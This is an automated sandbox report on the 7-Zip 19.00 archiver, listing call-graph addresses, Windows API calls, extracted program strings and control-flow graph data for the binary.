malloc _CxxThrowException free 28418->28431 28419->28285 28421->28298 28422->28310 28423->28309 28424->28316 28425->28322 28426->28328 28428 1d654d 28427->28428 28429 1d655e 28427->28429 28428->28429 28430 1d339c 4 API calls 28428->28430 28429->28418 28430->28429 28431->28419 28433 1d2130 2 API calls 28432->28433 28434 1f9989 28433->28434 28435 1f99a6 28434->28435 28436 1d3208 2 API calls 28434->28436 28437 1db8f0 4 API calls 28435->28437 28436->28435 28438 1f99e5 28437->28438 28438->28346 28440 1d6464 FreeLibrary 28439->28440 28441 1d64e7 28440->28441 28442 1d64ed 28441->28442 28443 1d64f1 LoadLibraryExW 28441->28443 28442->28353 28442->28354 28442->28360 28443->28442 28445 1f9312 GetProcAddress 28444->28445 28446 1f9242 GetProcAddress 28444->28446 28447 1f9370 28445->28447 28451 1f9327 28445->28451 28448 1f9262 28446->28448 28449 1f9372 28447->28449 28448->28445 28448->28449 28450 1f86e0 VariantClear SysStringByteLen 28448->28450 28452 1f92e0 memmove 28448->28452 28449->28360 28455 1fa180 GetProcAddress GetProcAddress 28449->28455 28450->28448 28451->28447 28451->28449 28490 1f8eec malloc _CxxThrowException memmove free 28451->28490 28489 1f8e6c malloc _CxxThrowException memmove free memmove 28452->28489 28456 1fa1eb GetProcAddress 28455->28456 28457 1fa214 GetProcAddress 28455->28457 28458 1fa200 28456->28458 28484 1fa233 28456->28484 28459 1fa20f 28457->28459 28457->28484 28458->28459 28458->28484 28460 1fa643 28459->28460 28460->28360 28461 1d3208 malloc _CxxThrowException 28461->28484 28462 1fa648 28494 1f94a8 7 API calls 28462->28494 28464 1fa36f SysStringByteLen 28465 1fa64d 28464->28465 28464->28484 28466 1dae2c VariantClear 28465->28466 28466->28462 28467 1f94a8 7 API calls 28467->28484 28468 1dae2c VariantClear 28468->28484 28469 1fa662 free free 28469->28462 28470 1f8928 malloc _CxxThrowException SysStringLen free VariantClear 28470->28484 28471 1fa67d free free 28471->28462 28472 1f9d98 19 API calls 28472->28484 28473 1fa698 free free 28473->28462 28474 1f9380 7 API calls 28474->28484 28475 1f87a8 VariantClear 28475->28484 28476 1fa6b0 free free free 28476->28462 28478 1fa6d3 free free free 28478->28462 28479 1f8860 VariantClear 28479->28484 28481 1fa6f6 free free free 28481->28462 28482 1d2130 2 API calls 28482->28484 28483 1f9af0 4 API calls 28483->28484 28484->28460 28484->28461 28484->28462 28484->28464 28484->28467 28484->28468 28484->28469 28484->28470 28484->28471 28484->28472 28484->28473 28484->28474 28484->28475 28484->28476 28484->28478 28484->28479 28484->28481 28484->28482 28484->28483 28485 1db8f0 4 API calls 28484->28485 28491 1f98d4 malloc _CxxThrowException memmove 28484->28491 28492 1fa034 8 API calls 28484->28492 28486 1fa607 free free free 28485->28486 28493 1f94a8 7 API calls 28486->28493 28488->28342 28489->28448 28490->28451 28492->28484 28496 1d3404 4 API calls 28495->28496 28497 1d7e06 28496->28497 28497->28370 28500 1d7e41 28498->28500 28499 1d7e4a 28499->28500 28504 1d7a90 malloc _CxxThrowException free memmove FindNextFileW 28499->28504 28500->28499 28501 1d7978 39 API calls 28500->28501 28503 1d7e70 28500->28503 28501->28500 28503->28380 28504->28499 28506 1f9bf5 28505->28506 28507 1f9c22 28505->28507 28506->28507 28510 1f9c0d free free 28506->28510 28508 1d3208 2 API calls 28507->28508 28509 1f9c2f 28508->28509 28511 1f9c36 free 28509->28511 28515 1f9c45 28509->28515 28510->28506 28512 1f9d2f 28511->28512 28512->28389 28513 1f9ce8 28514 1f9d25 free 28513->28514 28516 1d2130 2 API calls 28513->28516 28514->28512 28515->28513 28517 1d2130 2 API calls 28515->28517 28523 1d3314 3 API calls 28515->28523 28524 1db8f0 4 API calls 28515->28524 28518 1f9cfc 28516->28518 28517->28515 28519 1f9d16 28518->28519 28521 1d3314 3 API calls 28518->28521 28520 1db8f0 4 API calls 28519->28520 28522 1f9d24 28520->28522 28521->28519 28522->28514 28523->28515 28524->28515 28526 1f8f9c 28525->28526 28529 1f8fa8 28525->28529 28527 1d2130 2 API calls 28526->28527 28527->28529 28528 1f900a 28532 1f9078 28528->28532 28529->28528 28530 1d2130 2 API calls 28529->28530 28531 1d3314 malloc _CxxThrowException memmove 28529->28531 28530->28529 28531->28529 28533 1f90b6 28532->28533 28537 1f90c2 28532->28537 28534 1d2130 2 API calls 28533->28534 28534->28537 28535 1f913f 28535->28084 28536 1d2130 2 API calls 28536->28537 28537->28535 28537->28536 28538 1d2130 2 API calls 28537->28538 28539 1f9110 memmove 28538->28539 28539->28537 28540->28101 28541->28101 28542 219b5d 28543 219b61 fputs 28542->28543 28544 219b79 28542->28544 28699 1d2300 fputc 28543->28699 28700 21057c 28544->28700 28548 1d3208 2 API calls 28549 219bc5 28548->28549 28704 1f38e8 28549->28704 28557 219c61 28559 1d2130 malloc _CxxThrowException 28557->28559 28560 219c7d 28559->28560 28561 217414 malloc _CxxThrowException 28560->28561 28563 219c95 28560->28563 28561->28563 28562 1d3404 malloc _CxxThrowException free memmove 28564 219cd5 28562->28564 28563->28562 28565 2171ec malloc _CxxThrowException 28564->28565 28566 219d90 28565->28566 28567 1d3404 malloc _CxxThrowException free memmove 28566->28567 28568 219dee 28567->28568 28569 1def70 8 API calls 28568->28569 28570 219e63 28569->28570 28571 1d3208 malloc _CxxThrowException 28570->28571 28572 219e70 28571->28572 28573 1f6be0 malloc _CxxThrowException 28572->28573 28574 219e7e 28573->28574 28575 219ed2 28574->28575 28576 1f6e08 84 API calls 28574->28576 28577 1f5458 417 API calls 28575->28577 28578 219eb1 28576->28578 28579 219f49 28577->28579 28578->28575 28580 219eb6 _CxxThrowException 28578->28580 28581 219f60 28579->28581 28583 21b1c8 7 API calls 28579->28583 28580->28575 28582 219fb1 28581->28582 28585 1d2300 fputc 28581->28585 28584 21a02c 28582->28584 28587 1d2300 fputc 28582->28587 28583->28581 28586 21a063 28584->28586 28589 21a03c fputs 28584->28589 28588 219f86 fputs 28585->28588 28590 21a09e 28586->28590 28592 21a114 28586->28592 28595 21a077 fputs 28586->28595 28591 219fd4 28587->28591 28593 1d2300 fputc 28588->28593 28594 1d26a0 fputs 28589->28594 28590->28592 28597 21a0d3 28590->28597 28598 21a0ac fputs 28590->28598 28591->28584 28596 219fde fputs 28591->28596 28610 1d2300 fputc 28592->28610 28621 21a15c 28592->28621 28599 219f9e 28593->28599 28600 21a05b 28594->28600 28601 1d26a0 fputs 28595->28601 28602 1d26a0 fputs 28596->28602 28597->28592 28613 1d2300 fputc 28597->28613 28605 1d26a0 fputs 28598->28605 28606 1d2320 14 API calls 28599->28606 28607 1d2300 fputc 28600->28607 28603 21a096 28601->28603 28604 219ffd 28602->28604 28608 1d2300 fputc 28603->28608 28609 1d2300 fputc 28604->28609 28611 21a0cb 28605->28611 28612 219fa9 28606->28612 28607->28586 28608->28590 28615 21a005 fputs 28609->28615 28616 21a12c 28610->28616 28617 1d2300 fputc 28611->28617 28618 1d2300 fputc 28612->28618 28619 21a0e4 28613->28619 28614 21a320 free free 28620 1f6b58 free free 28614->28620 28623 1d26a0 fputs 28615->28623 28616->28621 28625 21a135 fputs 28616->28625 28617->28597 28618->28582 28619->28592 28626 21a0ed fputs 28619->28626 28627 21a347 free 28620->28627 28621->28614 28622 21a2e7 28621->28622 28633 21a18f 28621->28633 28624 1d2300 fputc 28622->28624 28628 21a024 28623->28628 28629 21a2ef 28624->28629 28630 1d26a0 fputs 28625->28630 28631 1d26a0 fputs 28626->28631 28632 217968 free free free free 28627->28632 28636 1d2300 fputc 28628->28636 28629->28614 28637 21a2f8 fputs 28629->28637 28638 21a154 28630->28638 28639 21a10c 28631->28639 28654 21a363 28632->28654 28633->28614 28634 21a1cd 28633->28634 28635 21a1a5 fputs 28633->28635 28641 21a1f3 fputs 28634->28641 28649 21a275 fputs 28634->28649 28640 1d26a0 fputs 28635->28640 28636->28584 28642 1d26a0 fputs 28637->28642 28643 1d2300 fputc 28638->28643 28644 1d2300 fputc 28639->28644 28645 21a1c5 28640->28645 28647 1d26a0 fputs 28641->28647 28646 21a317 28642->28646 28643->28621 28644->28592 28648 1d2300 fputc 28645->28648 28650 1d2300 fputc 28646->28650 28651 21a213 28647->28651 28648->28634 28652 1d26a0 fputs 28649->28652 28655 21a2e5 28650->28655 28656 1d2300 fputc 28651->28656 28657 21a295 28652->28657 28653 21a53d free 28659 21a55b 28653->28659 28660 21a58c free 28653->28660 28654->28653 28663 21a528 free free 28654->28663 28655->28614 28658 21a21b 28656->28658 28662 1d2300 fputc 28657->28662 28658->28649 28664 21a225 fputs 28658->28664 28659->28660 28668 21a577 free free 28659->28668 28661 21a5ad 28660->28661 28665 21a5c5 28661->28665 28669 21a5c0 28661->28669 28666 21a2a0 fputs 28662->28666 28663->28654 28667 1d26a0 fputs 28664->28667 28670 21a5e7 free 28665->28670 28671 21a5ca _CxxThrowException 28665->28671 28672 1d26a0 fputs 28666->28672 28673 21a245 28667->28673 28668->28659 28675 2166a8 30 API calls 28669->28675 28676 21a605 28670->28676 28677 21a626 free 28670->28677 28671->28670 28678 21a2c0 28672->28678 28674 1d2300 fputc 28673->28674 28679 21a24d fputs 28674->28679 28675->28665 28680 21a609 free 28676->28680 28681 21a63c 28677->28681 28682 1d2300 fputc 28678->28682 28683 1d26a0 fputs 28679->28683 28680->28677 28680->28680 28686 217080 6 API calls 28681->28686 28684 21a2c8 28682->28684 28685 21a26d 28683->28685 28684->28614 28689 1d2300 fputc 28684->28689 28687 1d2300 fputc 28685->28687 28688 21a64a 28686->28688 28687->28649 28690 1d182c free free free free free 28688->28690 28691 21a2d5 28689->28691 28692 21a658 28690->28692 28693 21291c 11 API calls 28691->28693 28694 217f50 61 API calls 28692->28694 28693->28655 28695 21a666 28694->28695 28696 21a6a8 free 28695->28696 28698 21a693 free free 28695->28698 28697 21a6b8 28696->28697 28698->28695 28699->28544 28701 21059a 28700->28701 28702 21058a 28700->28702 28701->28548 28763 1d2c78 malloc _CxxThrowException free 28702->28763 28764 1f1700 28704->28764 28709 1f3979 28777 1f3864 13 API calls 28709->28777 28711 1f3a27 28779 1f3864 13 API calls 28711->28779 28719 1d2130 2 API calls 28726 1f3992 28719->28726 28726->28711 28726->28719 28727 1d3314 3 API calls 28726->28727 28729 1db8f0 4 API calls 28726->28729 28778 1f09e0 6 API calls 28726->28778 28727->28726 28731 1f3a0b free 28729->28731 28731->28726 28763->28701 28780 1e1d04 GetCurrentProcess 28764->28780 28767 1f373c 28768 1f3819 28767->28768 28776 1f376d 28767->28776 28902 1f0a58 10 API calls 28768->28902 28770 1f3828 28903 1f0c24 98 API calls 28770->28903 28772 1f381b memmove 28772->28709 28772->28726 28773 1f1678 malloc _CxxThrowException memmove memmove free 28773->28776 28776->28768 28776->28773 28790 1f24c0 28776->28790 28778->28726 28781 1e1d3b OpenProcessToken 28780->28781 28782 1e1d25 CloseHandle 28780->28782 28783 1e1d9d 28781->28783 28784 1e1d52 LookupPrivilegeValueW 28781->28784 28782->28781 28787 1e1da7 CloseHandle 28783->28787 28788 1e1dad 28783->28788 28784->28783 28785 1e1d7f AdjustTokenPrivileges 28784->28785 28785->28783 28786 1e1db1 GetLastError 28785->28786 28786->28788 28789 1e1dc6 CloseHandle 28786->28789 28787->28788 28788->28767 28789->28788 28791 1f2508 28790->28791 28904 1f00bc 28791->28904 28793 1f3484 free 28793->28772 28793->28776 28794 1f32fd 28795 1d3208 2 API calls 28794->28795 28796 1f3316 28795->28796 28797 1d7df4 4 API calls 28796->28797 28802 1f3327 28797->28802 28798 1f2529 28798->28793 28811 1f306a 28798->28811 28901 1f2592 28798->28901 28799 1f3002 28803 1f3059 free 28799->28803 28800 1f30f6 28927 1d881c 14 API calls 28800->28927 28801 1d318c 4 API calls 28801->28901 28807 1d3208 2 API calls 28802->28807 28803->28793 28805 1d318c 4 API calls 28870 1f2bfc 28805->28870 28806 1f320f 28808 1f326b 28806->28808 28816 1f32d6 free free 28806->28816 28812 1f3343 28807->28812 28810 1f32ec free 28808->28810 28809 1d3314 3 API calls 28849 1f3119 28809->28849 28810->28793 28811->28794 28811->28800 28929 1d7e80 41 API calls 28812->28929 28813 1d3208 2 API calls 28813->28901 28816->28806 28817 1d3208 2 API calls 28817->28870 28818 1f326d free 28818->28808 28819 1f3282 28818->28819 28819->28808 28825 1f329b free free 28819->28825 28821 1f342c 28932 1f0084 GetLastError 28821->28932 28823 1f345c free 28824 1f346a free 28823->28824 28830 1d794c FindClose 28824->28830 28825->28819 28826 1f3437 28827 1f344d free 28826->28827 28828 1f343d free 28826->28828 28827->28824 28836 1f3496 free 28828->28836 28829 1f00f0 8 API calls 28829->28870 28830->28793 28831 1d3208 2 API calls 28831->28849 28832 1d3404 4 API calls 28832->28901 28833 1d7ebc 90 API calls 28833->28901 28839 1d794c FindClose 28836->28839 28837 1d3404 4 API calls 28837->28870 28838 1f00bc 30 API calls 28855 1f3361 28838->28855 28839->28793 28840 1d3404 4 API calls 28840->28849 28841 1f33dd free 28841->28855 28842 1f34b4 free free 28844 1d794c FindClose 28842->28844 28843 1d7ebc 90 API calls 28843->28870 28844->28793 28846 1f3488 free 28846->28836 28849->28806 28849->28809 28849->28818 28849->28831 28849->28840 28853 1f3214 free free 28849->28853 28854 1f31e3 free free 28849->28854 28928 1f1db4 319 API calls 28849->28928 28850 1f26dc free free 28850->28901 28851 1f2c0a free free 28851->28803 28852 1d3208 2 API calls 28852->28855 28853->28810 28859 1f323d 28853->28859 28854->28806 28854->28849 28855->28821 28855->28823 28855->28838 28855->28841 28855->28842 28855->28846 28855->28852 28930 1f1db4 319 API calls 28855->28930 28931 1d7e80 41 API calls 28855->28931 28856 1f2fa8 free 28857 1f303a free free 28856->28857 28858 1f2fba free free 28856->28858 28857->28803 28858->28870 28859->28808 28867 1f3256 free free 28859->28867 28861 1f2c28 free free 28861->28803 28862 1f2747 free free 28862->28901 28863 1d3314 malloc _CxxThrowException memmove 28863->28901 28864 1f2e66 free free 28864->28870 28865 1f2f94 free free 28865->28870 28867->28859 28868 1f301f free free 28868->28803 28869 1f2efb free free 28869->28870 28870->28799 28870->28805 28870->28817 28870->28829 28870->28837 28870->28843 28870->28856 28870->28864 28870->28865 28870->28868 28870->28869 28872 1f2e9e free free 28870->28872 28873 1f3004 free free 28870->28873 28924 1d3348 malloc _CxxThrowException free 28870->28924 28925 1f0084 GetLastError 28870->28925 28926 1f1890 319 API calls 28870->28926 28872->28870 28873->28803 28874 1f2810 free free free 28874->28901 28875 1f287a free 28875->28901 28876 1f27fc free free 28876->28901 28877 1f2866 free free 28877->28901 28880 1f2c46 free free 28880->28803 28882 1f2c64 free free 28882->28803 28883 1f2949 free free 28883->28901 28884 1f2a64 free free 28884->28901 28886 1d2130 malloc _CxxThrowException 28886->28901 28890 1db8f0 malloc _CxxThrowException memmove free 28890->28901 28891 1f2ce2 28892 1f2d21 free free free 28891->28892 28897 1f2d0d free free 28891->28897 28892->28803 28893 1f2ba0 free free free 28893->28901 28894 1f2c82 28896 1f2cb8 free free free 28894->28896 28900 1f2ca4 free free 28894->28900 28895 1f2a4f free 28895->28901 28896->28803 28897->28891 28898 1f2b8c free free 28898->28901 28899 1f2a33 free free 28899->28901 28900->28894 28901->28801 28901->28813 28901->28832 28901->28833 28901->28850 28901->28851 28901->28861 28901->28862 28901->28863 28901->28870 28901->28874 28901->28875 28901->28876 28901->28877 28901->28880 28901->28882 28901->28883 28901->28884 28901->28886 28901->28890 28901->28891 28901->28893 28901->28894 28901->28895 28901->28898 28901->28899 28908 1f00f0 28901->28908 28914 1d3348 malloc _CxxThrowException free 28901->28914 28915 1f0084 GetLastError 28901->28915 28916 1d50bc 11 API calls 28901->28916 28917 1f03bc 14 API calls 28901->28917 28918 1f14dc 12 API calls 28901->28918 28919 1f0554 59 API calls 28901->28919 28920 1f1988 87 API calls 28901->28920 28921 1d47a8 CharUpperW CharUpperW wcscmp 28901->28921 28922 1e710c malloc _CxxThrowException memmove free 28901->28922 28923 1f1890 319 API calls 28901->28923 28902->28770 28903->28772 28905 1f00e4 28904->28905 28906 1f00d0 28904->28906 28905->28798 28933 2105a0 28906->28933 28909 1d3314 3 API calls 28908->28909 28910 1f010f 28909->28910 28911 1d362c 6 API calls 28910->28911 28913 1f011d 28911->28913 28912 1f0182 free 28912->28901 28913->28912 28914->28901 28915->28901 28916->28901 28917->28901 28918->28901 28919->28901 28920->28901 28921->28901 28922->28901 28923->28901 28924->28870 28925->28870 28926->28870 28927->28849 28928->28849 28929->28855 28930->28855 28931->28855 28932->28826 28934 2105b0 28933->28934 28935 2105de 28933->28935 28936 1d3404 4 API calls 28934->28936 28935->28905 28937 2105d6 28936->28937 28938 21b480 30 API calls 28937->28938 28938->28935
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                                                                                • API String ID: 3442115484-272389550
                                                                                                                                                                                                                                • Opcode ID: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                • Instruction ID: 9539176c3f457f9e5108b4fef13b5db2fddadbb57c360f80ebc189044a5f6f56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 333ffd121fdcf203ab2e1200e73cc7bcd87e924206da6f59f5088d2f4f234a71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7872B472214AC196DB74EF25E5943EE73A1F7A8B80F408122DBAA47758DF3CC599CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                                                • Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                • Instruction ID: 127f561f90bbd578badf28e2aa65a6be7f0d70df10b3245b4ba776d5cc46da54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8826D32218A8886CB30EF25E4903BEB360F7E5B94F544126EBAD57B59DF78C945CB10

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1635 1f47ac-1f485c call 1d3314 * 2 1640 1f485e-1f4884 call 1d2880 1635->1640 1641 1f489a-1f491b call 1f6344 call 1d32bc call 1d3b5c free * 2 call 1d3208 call 1d3314 1635->1641 1640->1641 1647 1f4886-1f4895 call 1d3404 1640->1647 1656 1f49bd-1f49cb call 1d477c 1641->1656 1657 1f4921-1f4925 1641->1657 1647->1641 1662 1f4dff 1656->1662 1663 1f49d1-1f49e7 1656->1663 1657->1656 1659 1f492b-1f495e call 1d3208 call 1d449c 1657->1659 1676 1f49b0-1f49b8 free 1659->1676 1677 1f4960-1f496f 1659->1677 1665 1f4e02-1f4e05 1662->1665 1673 1f49e9-1f4a28 free * 4 1663->1673 1674 1f4a68-1f4ad2 call 1d3208 * 3 1663->1674 1668 1f4e07-1f4e1c call 1d2130 1665->1668 1669 1f4e40-1f4e45 1665->1669 1692 1f4e1e-1f4e2e call 1d3314 1668->1692 1693 1f4e30 1668->1693 1671 1f4e5d-1f4e62 call 1d70c8 1669->1671 1672 1f4e47-1f4e58 call 1d3518 1669->1672 1690 1f4e67-1f4e6a 1671->1690 1699 1f4f2c-1f4f98 call 1e3f0c 1672->1699 1681 1f4a2a 1673->1681 1682 1f4a58-1f4a63 free 1673->1682 1720 1f4ad8-1f4adb 1674->1720 1721 1f4d30-1f4d3b 1674->1721 1676->1656 1684 1f497a-1f498b 1677->1684 1685 1f4971-1f4978 1677->1685 1691 1f4a2e-1f4a41 1681->1691 1687 1f504a-1f5059 free 1682->1687 1686 1f4993-1f4996 1684->1686 1685->1684 1685->1686 1686->1676 1695 1f4998-1f49ad call 1d3404 1686->1695 1697 1f523b-1f524e 1687->1697 1690->1699 1700 1f4e70-1f4eea GetLastError call 1d3518 call 1d362c free * 4 1690->1700 1701 1f4a54-1f4a56 1691->1701 1702 1f4a43-1f4a4f free * 2 1691->1702 1696 1f4e33-1f4e3b call 1db8f0 1692->1696 1693->1696 1695->1676 1696->1669 1714 1f505e-1f5062 1699->1714 1715 1f4f9e-1f4fa2 1699->1715 1723 1f4eec 1700->1723 1724 1f4f1a-1f4f27 free 1700->1724 1701->1682 1701->1691 1702->1701 1718 1f506e 1714->1718 1719 1f5064-1f506c 1714->1719 1715->1714 1722 1f4fa8-1f4fac 1715->1722 1725 1f5071-1f507d 1718->1725 1719->1718 1719->1725 1726 1f4add-1f4ae0 1720->1726 1727 1f4b24-1f4b3e call 1fec5c 1720->1727 1728 1f4d41-1f4dae call 1e2a84 free * 4 1721->1728 1729 1f4df0-1f4dfd call 1e2a84 1721->1729 1722->1714 1730 1f4fb2-1f4fc7 call 1e32e8 1722->1730 1731 1f4ef0-1f4f03 1723->1731 1724->1687 1734 1f5083-1f50d1 1725->1734 1735 1f5152-1f516d 1725->1735 1726->1727 1736 1f4ae2-1f4aee 1726->1736 1746 1f4c9d-1f4cee call 1e2a84 free * 4 1727->1746 1747 1f4b44 1727->1747 1787 1f4dde-1f4deb free 1728->1787 1788 1f4db0 1728->1788 1729->1665 1730->1714 1753 1f4fcd-1f500d free * 4 1730->1753 1738 1f4f15-1f4f18 1731->1738 1739 1f4f05-1f4f10 free * 2 1731->1739 1785 1f5143-1f5150 call 1dae2c 1734->1785 1786 1f50d3-1f50de 1734->1786 1751 1f5173 1735->1751 1742 1f4b4c-1f4b50 1736->1742 1743 1f4af0-1f4af7 1736->1743 1738->1724 1738->1731 1739->1738 1748 1f4b52-1f4b5a 1742->1748 1749 1f4b60-1f4b63 1742->1749 1743->1742 1752 1f4af9-1f4b14 call 1fb290 1743->1752 1781 1f4d1e-1f4d2b free 1746->1781 1782 1f4cf0 1746->1782 1747->1742 1748->1749 1755 1f4bf5-1f4bff 1748->1755 1756 1f4b65-1f4b80 call 1d4318 1749->1756 1757 1f4bc1-1f4bc4 1749->1757 1758 1f5175-1f517b 1751->1758 1775 1f4c0a-1f4c5b call 1e2a84 free * 4 1752->1775 1776 1f4b1a-1f4b22 1752->1776 1761 1f500f 1753->1761 1762 1f503d-1f5048 free 1753->1762 1755->1720 1768 1f4c05 1755->1768 1796 1f4b87-1f4b9e 1756->1796 1797 1f4b82-1f4b85 1756->1797 1765 1f4bc6-1f4be1 call 1e43fc 1757->1765 1766 1f4be3-1f4bf2 call 21c7d4 1757->1766 1771 1f517d-1f5188 call 1e6cd0 1758->1771 1772 1f5190-1f519e call 211850 1758->1772 1764 1f5013-1f5026 1761->1764 1762->1687 1778 1f5038-1f503b 1764->1778 1779 1f5028-1f5033 free * 2 1764->1779 1765->1755 1765->1766 1766->1755 1768->1721 1771->1772 1794 1f51a1-1f51a6 1772->1794 1815 1f4c5d 1775->1815 1816 1f4c8b-1f4c98 free 1775->1816 1776->1742 1778->1762 1778->1764 1779->1778 1781->1687 1795 1f4cf4-1f4d07 1782->1795 1785->1758 1786->1785 1798 1f50e0-1f50e3 1786->1798 1787->1687 1801 1f4db4-1f4dc7 1788->1801 1802 1f51a8-1f51b0 call 1e6cd0 1794->1802 1803 1f51b1-1f51f1 free * 4 1794->1803 1804 1f4d19-1f4d1c 1795->1804 1805 1f4d09-1f4d14 free * 2 1795->1805 1808 1f4baf-1f4bb3 1796->1808 1809 1f4ba0-1f4ba8 1796->1809 1797->1757 1799 1f5138-1f5140 1798->1799 1800 1f50e5-1f50e7 1798->1800 1799->1785 1811 1f512b-1f5136 1800->1811 1812 1f50e9-1f50eb 1800->1812 1813 1f4dd9-1f4ddc 1801->1813 1814 1f4dc9-1f4dd4 free * 2 1801->1814 1802->1803 1818 1f51f3 1803->1818 1819 1f5221-1f5239 free * 2 1803->1819 1804->1781 1804->1795 1805->1804 1808->1757 1810 1f4bb5-1f4bbd 1808->1810 1809->1757 1820 1f4baa-1f4bad 1809->1820 1810->1757 1811->1785 1821 1f511f-1f5129 1812->1821 1822 1f50ed-1f50f0 1812->1822 1813->1787 1813->1801 1814->1813 1825 1f4c61-1f4c74 1815->1825 1816->1687 1824 1f51f7-1f520a 1818->1824 1819->1697 1820->1757 1821->1785 1826 1f5112-1f511d 1822->1826 1827 1f50f2-1f5111 _CxxThrowException 1822->1827 1830 1f521c-1f521f 1824->1830 1831 1f520c-1f5217 free * 2 1824->1831 1828 1f4c86-1f4c89 1825->1828 1829 1f4c76-1f4c81 free * 2 1825->1829 1826->1785 1827->1826 1828->1816 1828->1825 1829->1828 1830->1819 1830->1824 1831->1830
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Can not create output directory: , xrefs: 001F4E83
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                                                                                • String ID: Can not create output directory:
                                                                                                                                                                                                                                • API String ID: 4159955631-3123869724
                                                                                                                                                                                                                                • Opcode ID: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
                                                                                                                                                                                                                                • Instruction ID: c04ac1099e3031d672d5cf941f95d081f999c0ec4e05742d2a6c929ff380a024
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 342012ea8a5d9de563d8076d0ff135b9a41e5e317faebfc52beceac274ff6334
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1426C32219AC496CB30EF25E8903AEB361F7E6B80F585122DB9D43B59DF38D955CB00

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
